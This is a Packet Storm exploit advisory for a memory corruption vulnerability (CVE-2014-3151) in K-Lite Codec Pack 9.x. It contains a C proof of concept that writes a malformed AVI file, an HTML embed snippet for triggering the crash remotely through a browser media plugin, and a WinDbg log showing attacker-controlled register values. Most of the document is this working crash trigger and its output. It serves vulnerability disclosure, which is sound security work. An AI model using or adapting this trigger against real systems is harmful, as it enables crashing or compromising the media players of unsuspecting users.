K-Lite CODEC 9.x Memory Corruption

2014-05-05T00:00:00
ID PACKETSTORM:126474
Type packetstorm
Reporter Aryan Bayaninejad
Modified 2014-05-05T00:00:00

Description

                                        
                                            `# Exploit Title: [K-lite codec Version 9.x Memory corruption vulnerability]  
# Date: [2014/05/3]  
# Author: [Aryan Bayaninejad]  
# Linkedin : https://www.linkedin.com/profile/view?id=276969082  
# Vendor Homepage: [http://www.codecguide.com]  
# Software Link: [  
http://www.oldapps.com/k-lite_codec_pack.php?old_klite_codec=12328]  
# Version: [version 9.x and prior]  
# Tested on: [Windows Xp Sp3 32bit and 64 bit , Windows 7 32bit and 64 bit]  
# CVE : [CVE-2014-3151]  
# Found by Piece Dumb Fuzzer  
  
details:  
  
K-lite codec version 9.x and prior to that are vulnerable to a memory  
corruption vulnerability which allows remote attackers to execute arbitrary  
code execution to control the remote system via a malformed AVI file format  
.  
  
Tested on "Windows Media player latest edition", Internet explorer, GOM  
Player & KM player, Windows XP, 7 x64 & x86 .  
  
--------------------------------------------------------------------------------------------------------------------------------------------------  
PoC to trigger memory corruption :  
  
#include<stdio.h>  
#include<stdlib.h>  
#include<windows.h>  
  
unsigned char sc[154] =  
{  
0x52, 0x49, 0x46, 0x46, 0x44, 0x5E, 0x0A, 0x00, 0x41, 0x56, 0x49, 0x20,  
0x4C, 0x49, 0x53, 0x54,  
0x7C, 0xFC, 0x00, 0x00, 0x49, 0x4E, 0x46, 0x4F, 0x2D, 0x2D, 0x2D, 0x3E,  
0xFC, 0xFF, 0xFF, 0xFF,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41,  
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,  
} ;  
int main(int argc, char *argv[])  
{  
HANDLE fileHandle = INVALID_HANDLE_VALUE;  
DWORD dwBytesWritten = 0;  
fileHandle =  
CreateFile("d:\\poc.AVI",GENERIC_WRITE,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);  
if(fileHandle == INVALID_HANDLE_VALUE)  
{  
printf("(-)Failed to Create File");  
exit(0);  
}else{  
printf("(+) Writing File ...");  
WriteFile(fileHandle,sc,154,&dwBytesWritten,NULL);  
}  
CloseHandle(fileHandle);  
return 0;  
}  
  
  
--------------------------------------------------------------------------------------------------------------------------------------------------  
PoC to Remote trigger memory corruption :  
  
  
<embed type="application/x-mplayer2" pluginspage="  
http://www.microsoft.com/Windows/MediaPlayer/"  
name="mediaplayer1" ShowStatusBar="true" EnableContextMenu="false"  
autostart="false"  
height="330" width="360" loop="false" src="D:/PoC.avi" />  
  
  
  
windbg result:  
  
Microsoft (R) Windows Debugger Version 6.2.9200.16384 X86  
Copyright (c) Microsoft Corporation. All rights reserved.  
  
*** wait with pending attach  
Symbol search path is: c:\netw0rm\symbols  
Executable search path is:  
ModLoad: 01000000 01013000 C:\Program Files\Windows Media  
Player\wmplayer.exe  
ModLoad: 7c900000 7c9b2000 C:\WINDOWS\system32\ntdll.dll  
ModLoad: 7c800000 7c8f6000 C:\WINDOWS\system32\kernel32.dll  
ModLoad: 77dd0000 77e6b000 C:\WINDOWS\system32\ADVAPI32.dll  
ModLoad: 77e70000 77f02000 C:\WINDOWS\system32\RPCRT4.dll  
ModLoad: 77fe0000 77ff1000 C:\WINDOWS\system32\Secur32.dll  
ModLoad: 7e410000 7e4a1000 C:\WINDOWS\system32\USER32.dll  
ModLoad: 77f10000 77f59000 C:\WINDOWS\system32\GDI32.dll  
ModLoad: 76390000 763ad000 C:\WINDOWS\system32\IMM32.DLL  
ModLoad: 629c0000 629c9000 C:\WINDOWS\system32\LPK.DLL  
ModLoad: 74d90000 74dfb000 C:\WINDOWS\system32\USP10.dll  
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll  
ModLoad: 77c10000 77c68000 C:\WINDOWS\system32\msvcrt.dll  
ModLoad: 12950000 133b5000 C:\WINDOWS\system32\wmp.dll  
ModLoad: 774e0000 7761e000 C:\WINDOWS\system32\ole32.dll  
ModLoad: 773d0000 774d3000  
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5705_x-ww_36cfed49\COMCTL32.dll  
ModLoad: 77f60000 77fd6000 C:\WINDOWS\system32\SHLWAPI.dll  
ModLoad: 77120000 771ab000 C:\WINDOWS\system32\OLEAUT32.dll  
ModLoad: 77c00000 77c08000 C:\WINDOWS\system32\VERSION.dll  
ModLoad: 75a70000 75a91000 C:\WINDOWS\system32\MSVFW32.dll  
ModLoad: 76b40000 76b6d000 C:\WINDOWS\system32\WINMM.dll  
ModLoad: 7c9c0000 7d1d7000 C:\WINDOWS\system32\SHELL32.dll  
ModLoad: 59a60000 59b01000 C:\WINDOWS\system32\dbghelp.dll  
ModLoad: 13740000 13f1b000 C:\WINDOWS\system32\wmploc.dll  
ModLoad: 74720000 7476c000 C:\WINDOWS\system32\MSCTF.dll  
ModLoad: 00ba0000 00e65000 C:\WINDOWS\system32\xpsp2res.dll  
ModLoad: 755c0000 755ee000 C:\WINDOWS\system32\msctfime.ime  
ModLoad: 4ec50000 4edf6000  
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.5660_x-ww_e0385ec6\gdiplus.dll  
ModLoad: 76fd0000 7704f000 C:\WINDOWS\system32\CLBCATQ.DLL  
ModLoad: 77050000 77115000 C:\WINDOWS\system32\COMRes.dll  
ModLoad: 63380000 63434000 C:\WINDOWS\system32\jscript.dll  
ModLoad: 7e720000 7e7d0000 C:\WINDOWS\system32\SXS.DLL  
ModLoad: 0d780000 0d7be000 C:\Program Files\Windows Media Player\mpvis.dll  
ModLoad: 63000000 630e6000 C:\WINDOWS\system32\WININET.dll  
ModLoad: 01400000 01409000 C:\WINDOWS\system32\Normaliz.dll  
ModLoad: 1a400000 1a532000 C:\WINDOWS\system32\urlmon.dll  
ModLoad: 5dca0000 5de88000 C:\WINDOWS\system32\iertutil.dll  
ModLoad: 15110000 1536c000 C:\WINDOWS\system32\wmvcore.dll  
ModLoad: 11c70000 11caa000 C:\WINDOWS\system32\WMASF.DLL  
ModLoad: 76380000 76385000 C:\WINDOWS\system32\MSIMG32.dll  
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\SETUPAPI.dll  
ModLoad: 77690000 776b1000 C:\WINDOWS\system32\NTMARTA.DLL  
ModLoad: 71bf0000 71c03000 C:\WINDOWS\system32\SAMLIB.dll  
ModLoad: 76f60000 76f8c000 C:\WINDOWS\system32\WLDAP32.dll  
ModLoad: 0bef0000 0bf27000 C:\WINDOWS\system32\MFPlat.DLL  
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll  
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll  
ModLoad: 76c30000 76c5e000 C:\WINDOWS\system32\WINTRUST.dll  
ModLoad: 77a80000 77b15000 C:\WINDOWS\system32\CRYPT32.dll  
ModLoad: 77b20000 77b32000 C:\WINDOWS\system32\MSASN1.dll  
ModLoad: 76c90000 76cb8000 C:\WINDOWS\system32\IMAGEHLP.dll  
ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv  
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv  
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll  
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll  
ModLoad: 61da0000 61db0000 C:\WINDOWS\system32\mcicda.dll  
ModLoad: 0e510000 0e562000 C:\WINDOWS\system32\mswmdm.dll  
ModLoad: 769c0000 76a74000 C:\WINDOWS\system32\USERENV.dll  
ModLoad: 5b860000 5b8b6000 C:\WINDOWS\system32\netapi32.dll  
ModLoad: 0dfb0000 0dfe9000 C:\WINDOWS\system32\mspmsp.dll  
ModLoad: 07940000 0797b000 C:\WINDOWS\system32\cewmdm.dll  
ModLoad: 11d10000 11d1d000 C:\WINDOWS\system32\wmdmps.dll  
ModLoad: 62bf0000 62c22000 C:\WINDOWS\system32\upnphost.dll  
ModLoad: 4d4f0000 4d549000 C:\WINDOWS\system32\WINHTTP.dll  
ModLoad: 74f00000 74f0c000 C:\WINDOWS\system32\SSDPAPI.dll  
ModLoad: 76d60000 76d79000 C:\WINDOWS\system32\iphlpapi.dll  
ModLoad: 13fe0000 14014000 C:\Program Files\Windows Media  
Player\wmpnssci.dll  
ModLoad: 109c0000 109ec000 C:\WINDOWS\system32\PortableDeviceTypes.dll  
ModLoad: 10930000 10979000 C:\WINDOWS\system32\PortableDeviceApi.dll  
ModLoad: 0e020000 0e089000 C:\WINDOWS\system32\MSSCP.dll  
ModLoad: 75cf0000 75d81000 C:\WINDOWS\system32\mlang.dll  
ModLoad: 08b70000 08c65000 C:\WINDOWS\system32\drmv2clt.dll  
ModLoad: 76ee0000 76f1c000 C:\WINDOWS\system32\RASAPI32.dll  
ModLoad: 76e90000 76ea2000 C:\WINDOWS\system32\rasman.dll  
ModLoad: 76eb0000 76edf000 C:\WINDOWS\system32\TAPI32.dll  
ModLoad: 76e80000 76e8e000 C:\WINDOWS\system32\rtutils.dll  
ModLoad: 77c70000 77c94000 C:\WINDOWS\system32\msv1_0.dll  
ModLoad: 722b0000 722b5000 C:\WINDOWS\system32\sensapi.dll  
ModLoad: 14030000 14054000 C:\WINDOWS\system32\wmpps.dll  
ModLoad: 71a50000 71a8f000 C:\WINDOWS\system32\mswsock.dll  
ModLoad: 662b0000 66308000 C:\WINDOWS\system32\hnetcfg.dll  
ModLoad: 71a90000 71a98000 C:\WINDOWS\System32\wshtcpip.dll  
ModLoad: 76fc0000 76fc6000 C:\WINDOWS\system32\rasadhlp.dll  
ModLoad: 76f20000 76f47000 C:\WINDOWS\system32\DNSAPI.dll  
ModLoad: 10000000 10008000 C:\Program Files\Internet Download  
Manager\idmmkb.dll  
ModLoad: 77b40000 77b62000 C:\WINDOWS\system32\appHelp.dll  
ModLoad: 5cb00000 5cb6e000 C:\WINDOWS\system32\shimgvw.dll  
ModLoad: 38a70000 38a7c000  
C:\PROGRA~1\COMMON~1\MICROS~1\OFFICE12\MSOXMLMF.DLL  
ModLoad: 78130000 781cb000  
C:\WINDOWS\WinSxS\x86_Microsoft.VC80.CRT_1fc8b3b9a1e18e3b_8.0.50727.6195_x-ww_44262b86\MSVCR80.dll  
ModLoad: 74810000 7497d000 C:\WINDOWS\system32\quartz.dll  
ModLoad: 75f40000 75f51000 C:\WINDOWS\system32\devenum.dll  
ModLoad: 02f30000 02f9e000 C:\Program Files\K-Lite Codec  
Pack\Filters\LAV\LAVSplitter.ax  
ModLoad: 6f640000 6f753000 C:\Program Files\K-Lite Codec  
Pack\Filters\LAV\avformat-lav-55.dll  
ModLoad: 69f00000 6aac0000 C:\Program Files\K-Lite Codec  
Pack\Filters\LAV\avcodec-lav-55.dll  
ModLoad: 6f540000 6f581000 C:\Program Files\K-Lite Codec  
Pack\Filters\LAV\avutil-lav-52.dll  
ModLoad: 02c00000 02c32000 C:\Program Files\K-Lite Codec  
Pack\Filters\LAV\libbluray.dll  
ModLoad: 02fe0000 03176000 C:\Program Files\K-Lite Codec  
Pack\Filters\vsfilter.dll  
ModLoad: 763b0000 763f9000 C:\WINDOWS\system32\COMDLG32.dll  
ModLoad: 73000000 73026000 C:\WINDOWS\system32\WINSPOOL.DRV  
ModLoad: 133d0000 1340f000 C:\WINDOWS\system32\wmpasf.dll  
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll  
ModLoad: 57fd0000 57ff7000 C:\WINDOWS\system32\mpg2splt.ax  
ModLoad: 031d0000 03206000 C:\Program Files\Common Files\Roxio  
Shared\9.0\MPEG\RoxioMPEGDemuxer.dll  
ModLoad: 03210000 0329b000 C:\Program Files\K-Lite Codec  
Pack\Filters\Haali\splitter.ax  
ModLoad: 02fc0000 02fd7000 C:\Program Files\K-Lite Codec  
Pack\Filters\Haali\mkzlib.dll  
ModLoad: 032b0000 032bc000 C:\Program Files\K-Lite Codec  
Pack\Filters\Haali\mkunicode.dll  
ModLoad: 03330000 03350000 C:\Program Files\K-Lite Codec  
Pack\Filters\Haali\avi.dll  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\WINDOWS\system32\ntdll.dll -  
(a20.f58): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for  
C:\Program Files\K-Lite Codec Pack\Filters\Haali\avi.dll -  
eax=41414141 ebx=03360000 ecx=41414141 edx=03362248 esi=03362240  
edi=00000044  
eip=7c910ede esp=01d2f92c ebp=01d2fb4c iopl=0 nv up ei pl zr na pe  
nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000  
efl=00010246  
ntdll!wcsncpy+0x905:  
7c910ede 8b39 mov edi,dword ptr [ecx]  
ds:0023:41414141=????????  
`